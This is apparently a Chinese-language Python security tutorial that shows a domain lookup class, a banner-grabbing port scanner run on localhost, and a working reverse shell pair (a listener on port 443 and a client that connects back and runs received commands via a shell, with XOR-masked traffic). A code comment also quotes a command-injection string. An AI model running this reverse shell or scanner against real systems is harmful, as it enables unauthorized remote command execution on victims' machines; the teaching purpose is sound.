0x01.python类
#coding=utf-8
import os
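class Domain:
    """A (domain, port, protocol) triple that renders itself as a URL and can be resolved.

    Args:
        domain: hostname or IP literal, e.g. ``'www.freebuf.com'``.
        port: TCP port.  The demo passes it as a string (``'80'``); ``URL()``
            goes through ``str()`` so an ``int`` now works as well.
        protocol: ``'http'`` or ``'https'``.  Anything else makes ``URL()``
            raise ``ValueError`` (the original fell through both ``if``
            branches and died with ``UnboundLocalError``).
    """

    def __init__(self, domain, port, protocol):
        self.domain = domain
        self.port = port
        self.protocol = protocol

    def URL(self):
        """Return ``'<protocol>://<domain>:<port>/'``.

        Raises:
            ValueError: if ``protocol`` is neither ``'http'`` nor ``'https'``.
        """
        if self.protocol not in ('http', 'https'):
            raise ValueError('unsupported protocol: %r' % (self.protocol,))
        return '%s://%s:%s/' % (self.protocol, self.domain, str(self.port))

    def lookup(self):
        """Resolve ``domain`` with the ``host`` command; output goes to stdout.

        The original ran ``os.system("host " + domain)``, so a domain such as
        ``"x; rm -rf ~"`` would be interpreted by /bin/sh.  Passing an argument
        list hands the value to ``host`` as one argv element and no shell is
        involved.  Returns the ``host`` exit status, or ``None`` if ``host``
        is not installed (``os.system`` would have had the shell print
        "not found" instead of raising).
        """
        import subprocess  # function-scope import keeps the class self-contained
        try:
            return subprocess.call(['host', self.domain])
        except OSError:
            return None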
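if __name__ == "__main__":
    # Demo: build a Domain, print its URL and fields, then resolve it with `host`.
    # print(x) with a single argument behaves identically on Python 2 and 3;
    # the original `print x` statements are a SyntaxError on Python 3.
    domain = Domain('www.freebuf.com', '80', 'http')
    print(domain.URL())
    print(domain.port)
    print(domain.protocol)
    domain.lookup()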
the end:
root@kali:~/Desktop# python ./test.py
http://www.freebuf.com:80/
80
http
www.freebuf.com has address 123.151.180.21
environment: kali + py2.7.3
0x02 scan port
开启了本机的ssh也就是22端口。一个简单的演示。
#coding=utf-8
import socket
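ports = [21, 22, 53, 80, 443, 445, 3389, 5050, 5678, 8080, 8081]
hosts = ['127.0.0.1']


def grab_banner(host, port, timeout=2.0):
    """Connect to ``host:port``, send one junk line and return the first reply.

    Returns the reply as ``bytes``, or ``None`` when the connection fails or
    the service says nothing within ``timeout`` seconds.

    The original had no timeout and a bare ``except: pass``: a service that
    waits for the client to speak first, or ignores the junk line, left the
    whole scan stuck in ``recv``.  ``settimeout`` bounds both ``connect`` and
    ``recv``; only socket errors are swallowed, and the socket is always
    closed.
    """
    s = socket.socket()
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        # Junk probe to coax a reply out of text protocols.  The original
        # ended it with '/n' (a literal slash), almost certainly meant as a
        # newline.
        s.send(b'adsfsafdsfadfsadfasdfasdfas \n')
        banner = s.recv(1024)
    except (socket.error, socket.timeout):
        return None
    finally:
        s.close()
    return banner or None


def main():
    """Try every (host, port) pair and print the banner of each port that answered."""
    for host in hosts:
        for port in ports:
            print("[+]Attempting to connect to " + host + ":" + str(port))
            banner = grab_banner(host, port)
            if banner:
                # recv returns bytes on Python 3; decode before concatenating.
                print("[+]" + host + ":" + str(port) + " open: \n"
                      + banner.decode('utf-8', 'replace'))


if __name__ == "__main__":
    main()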
结果:
root@kali:~/Desktop# python ./scan.py
[+]Attempting to connect to 127.0.0.1:21
[+]Attempting to connect to 127.0.0.1:22
[+]127.0.0.1:22 open:
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2
[+]Attempting to connect to 127.0.0.1:53
[+]Attempting to connect to 127.0.0.1:80
[+]Attempting to connect to 127.0.0.1:443
[+]Attempting to connect to 127.0.0.1:445
[+]Attempting to connect to 127.0.0.1:3389
[+]Attempting to connect to 127.0.0.1:5050
[+]Attempting to connect to 127.0.0.1:5678
[+]Attempting to connect to 127.0.0.1:8080
[+]Attempting to connect to 127.0.0.1:8081
这只是个示例程序,不实用:socket没有设置超时,扫到一个不先发送banner、只等客户端数据(不能既recv又send)的服务时,会一直卡在recv上。
0x03 Reverse Shell – 反向shell
一个简单的udp server-client.py
#coding=utf-8
import socket
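host = ''  # '' = INADDR_ANY: the socket listens on every interface, not only loopback
port = 1024
bufsize = 128
addr = (host, port)


def main():
    """Receive datagrams on ``addr`` forever and print each sender and payload.

    Ctrl-C ends the loop and the socket is closed in ``finally``; in the
    original the ``close()`` after ``while True`` was unreachable.  Because
    ``host`` is ``''`` any machine that can reach this port can send to it;
    use ``'127.0.0.1'`` for a purely local demo.
    """
    udp_server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_server.bind(addr)
    try:
        while True:
            print('waiting for message...')
            data, sender = udp_server.recvfrom(bufsize)
            # recvfrom returns bytes on Python 3; decode before concatenating.
            print('...received from and return to:' + str(sender) + ": "
                  + data.decode('utf-8', 'replace'))
    except KeyboardInterrupt:
        pass
    finally:
        udp_server.close()


if __name__ == "__main__":
    main()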
#coding=utf-8
import socket
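host = 'localhost'
port = 1024
bufsize = 128
addr = (host, port)

try:
    _read_line = raw_input  # Python 2
except NameError:
    _read_line = input      # Python 3


def main():
    """Read lines from stdin and send each one as a datagram to ``addr``.

    An empty line, EOF (Ctrl-D) or Ctrl-C ends the session and the socket is
    closed in ``finally``.  The original only closed on an empty line and
    died with a traceback on EOF.  UDP is connectionless: nothing here tells
    you whether anyone is listening.
    """
    udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        while True:
            try:
                data = _read_line('>')
            except (EOFError, KeyboardInterrupt):
                break
            if not data:
                break
            # sendto needs bytes on Python 3; Python 2's str already is bytes.
            if not isinstance(data, bytes):
                data = data.encode('utf-8')
            udp_client.sendto(data, addr)
    finally:
        udp_client.close()


if __name__ == "__main__":
    main()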
接下来是一个反向shell的演示程序。
attacker.py
#coding=utf-8
import socket
"""
建立socket监听端口
"""
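XOR_KEY = 0x41

try:
    _read_line = raw_input  # Python 2
except NameError:
    _read_line = input      # Python 3


def _xor(data, key=XOR_KEY):
    """Return ``data`` with every byte XORed by ``key``; applying it twice restores the input.

    This is obfuscation, not encryption: a fixed single-byte key is recovered
    from any known plaintext and provides no integrity, so anyone on the path
    can read or inject commands.
    """
    return bytearray(b ^ key for b in bytearray(data))


def main():
    """Listen on 0.0.0.0:443, accept the first client and relay typed commands to it.

    Each prompt line is XOR-masked and sent; one ``recv`` chunk (at most 2048
    bytes) is read back, unmasked and printed, so longer output is not
    reassembled here.  There is no authentication: whoever connects first
    becomes the "shell".  Binding port 443 needs root (or
    CAP_NET_BIND_SERVICE) on Linux.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", 443))
    s.listen(2048)
    print("Listening on port 443... ")
    (client, (ip, port)) = s.accept()
    print(" recived connection from : " + str(ip))
    try:
        while True:
            try:
                command = _read_line('~$ ')
            except (EOFError, KeyboardInterrupt):
                break
            if not command:
                # Sending zero bytes leaves the peer, and then our recv,
                # blocked forever; the original hung on an empty line.
                continue
            if not isinstance(command, bytes):
                command = command.encode('utf-8')
            client.send(_xor(command))
            en_data = client.recv(2048)
            if not en_data:
                break  # peer closed the connection
            # print(bytearray) shows a repr on Python 3; decode for readable output.
            print(_xor(en_data).decode('utf-8', 'replace'))
    finally:
        client.close()
        s.close()


if __name__ == "__main__":
    main()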
shell.py
#!/usr/bin/python
import socket, subprocess, sys
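# The original indexed sys.argv[1] unconditionally and crashed with IndexError
# when run without an argument.
RHOST = sys.argv[1] if len(sys.argv) > 1 else None
RPORT = 443
XOR_KEY = 0x41


def _xor(data, key=XOR_KEY):
    """Return ``data`` with every byte XORed by ``key``; applying it twice restores the input.

    Obfuscation only: a constant one-byte key hides nothing from anyone who
    captures the traffic and authenticates neither side.
    """
    return bytearray(b ^ key for b in bytearray(data))


def main(rhost, rport=RPORT):
    """Connect back to ``rhost:rport`` and run every received line through ``/bin/sh``.

    Each command is executed with ``shell=True`` exactly as the peer sent it;
    that is the purpose of a reverse shell, so only point it at a listener
    you control.  Stdout is masked and sent back, stderr is printed locally,
    as in the original.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((rhost, rport))
    try:
        while True:
            data = s.recv(1024)
            if not data:
                break  # listener went away; the original spun on b'' forever
            # str(bytearray) is a repr on Python 3; decode to get the command text.
            command = _xor(data).decode('utf-8', 'replace')
            # communicate() alone: the original called wait() first, which can
            # deadlock once the child fills a PIPE (see the subprocess docs).
            comm = subprocess.Popen(command, shell=True,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE,
                                    stdin=subprocess.PIPE)
            stdout, stderr = comm.communicate()
            print(stderr.decode('utf-8', 'replace'))
            # A command with no output would send zero bytes and leave the
            # listener blocked in recv; send a newline so it always gets a reply.
            s.send(_xor(stdout or b'\n'))
    finally:
        s.close()


if __name__ == "__main__":
    if RHOST is None:
        sys.exit("usage: shell.py RHOST")
    main(RHOST)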
从中可以看出:攻击者监听自己的443端口,然后在受害者上运行shell.py,可使受害机器连接到攻击者的机器上,同时使用subprocess模块执行由attacker发过来的命令,并将受害机器的命令回显发回到攻击者的机器上,相当于一个远程shell,并不是最标准的交互式shell(nc反弹拿shell)。需要注意,这里对流量做的XOR 0x41只是混淆而不是加密:密钥固定且只有一个字节,任何能看到流量的人都可以还原并伪造命令,而且attacker端对连入的客户端没有任何身份验证。